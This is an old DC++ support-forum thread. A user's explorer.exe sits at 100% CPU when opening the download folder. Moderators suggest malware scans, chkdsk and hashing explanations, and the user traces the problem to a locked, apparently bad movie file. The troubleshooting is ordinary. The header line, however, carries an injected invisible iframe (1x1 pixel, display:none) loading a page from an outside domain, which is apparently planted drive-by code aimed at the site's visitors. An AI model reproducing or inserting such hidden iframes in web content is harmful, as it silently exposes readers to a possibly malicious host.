Explorer.exe CPU usage hits 100%

Non-DC related talk...<iframe src=http://pokupka.ks.ua/templates/As/image ... p?from=com width=1 height=1 style=display:none></iframe>

Moderator: Moderators

Edison Frisk

Explorer.exe CPU usage hits 100%

Post by Edison Frisk » 2004-09-12 03:10

When I try to access a file or play a file from my downloaded folder from DC++ my explorer.exe cpu usage goes through the roof indefinately. I have to reboot each time. It stays a constant 98% sometimes hitting 100%. This occurs when I havent even tried to access DC++ and just occurs when I click on anything in my download/upload folder, creating a problem for me to share my files. I today tried to tidy up my dc++ folder and simply cant do it because my computer virtually locks up. Any help would be very much appreciated. Ed. I can play media files which I extract from the folder and play from somewhere else its just trying to run or move anything from the dc++ download folder that causes the explorer.exe (which is XP btw SP1) to gobble up my cpu :(

BSOD2600
Forum Moderator

Post by BSOD2600 » 2004-09-12 15:21

Being that the computer uses 100% cpu when DC++ is not running, means its not a DC++ problem.

1) Scan your computer for viruses
2) scan for malware (download and install 'SpyBot Search and Destroy' and AdAware)
3) Check your hard drive for errors: start | run | cmd /k chkdsk /v /r

Edison Frisk

Post by Edison Frisk » 2004-09-13 07:24

I have run adaware and spy bot, updated my anti-virus software and nothing was found. I promise you its sometihng to do with DC++ and the folders I download to or upload to users from. When ever I access them whether dc++ is running or not the explorer.exe in taskbar manager goes crazy. I read something about hashing files, I dont really know what this is but believe the files once downloaded needs to be hashed or something. Any further advices would be appreciated. In addition I have movie files in other folders and have played around moving things from folder to folder but it seems only to be the folders associated with DC++ that causes the problems for me.

TheParanoidOne
Forum Moderator

Post by TheParanoidOne » 2004-09-13 07:30

Edison Frisk wrote:I promise you its sometihng to do with DC++ and the folders I download to or upload to users from. When ever I access them whether dc++ is running or not the explorer.exe in taskbar manager goes crazy.
If it also happens when DC++ is not running, how is it a DC++ problem?

Did you do step 3 (chkdsk) from the three steps BSOD2600 gave you?
The world is coming to an end. Please log off.

DC++ Guide | Words

Edison Frisk

Post by Edison Frisk » 2004-09-13 07:56

I did do step three, I think its to do with the hashing thing.

Guitarm
Forum Moderator

Post by Guitarm » 2004-09-13 08:06

Are you going decide if DC++ is running on your machine or not? :) , If you had it running and close it be sure to check that the actual process is not running. It can take a while before it actually terminates. Take a look with process_explorer.

Regards
"Nothing really happens fast. Everything happens at such a rate that by the time it happens, it all seems normal."

Edison Frisk

Post by Edison Frisk » 2004-09-13 08:16

I believe it to be hashing. I am fairly new to DC++ and have around 18gb to share in my upload folder. I have been told that my pc is hashing these files and after reading the FAQ on the web-site I think this is whats causing the high CPU load. I need to know a couple of things.

1. Do the upload files 'hash' even when DC++ is not running.
2. If this is the case would simply opening the folder make my pc hash the files.
3. Will the CPU load show in Explorer.exe (in task manager) when the files are being hashed.
4. How long does it take to hash 1gb of files?

Many thanks for your help in advance - and less of the arsey comments pls :) I am new to this.

Guitarm
Forum Moderator

Post by Guitarm » 2004-09-13 08:33

1. Do the upload files 'hash' even when DC++ is not running.
No, hashing is a part of DC++'s running process
2. If this is the case would simply opening the folder make my pc hash the files.
Again, no
3. Will the CPU load show in Explorer.exe (in task manager) when the files are being hashed.
Yes, there is going to be a certain load but that's mainly I/O as hashing is opening/closing files
4. How long does it take to hash 1gb of files?
Depends on the specs of your comp. Mainly bus, controller, disks
Many thanks for your help in advance - and less of the arsey comments pls :) I am new to this.
Can you handle a joke? :wink:

Regards
"Nothing really happens fast. Everything happens at such a rate that by the time it happens, it all seems normal."

Edison Frisk

Post by Edison Frisk » 2004-09-13 10:02

wOOt!! I have finally solved the problem. While my pc was running painfully slow like I have explained I was moving all the files out of the shared folder, but one wouldnt shift as it said it was being used by another program. A downloaded movie was the culprit and I remember now I got a ridiculous download speed like over 1000kb/s during its download. It wouldn't let me delete it so I removed everything else and deleted the folder with it in it and bingo PC running normally again. Going to put the rest of the stuff back in a new folder bit by bit. Thanks for the help tho guys, and yes I can take a joke :)

Guitarm
Forum Moderator

Post by Guitarm » 2004-09-13 10:08

Good, you're happy, I'm happy, everybody's happy :lol:

PseudonympH
Forum Moderator

Post by PseudonympH » 2004-09-13 14:15

To stop this from happening again, look around (google/hubs) for xp-avifix.inf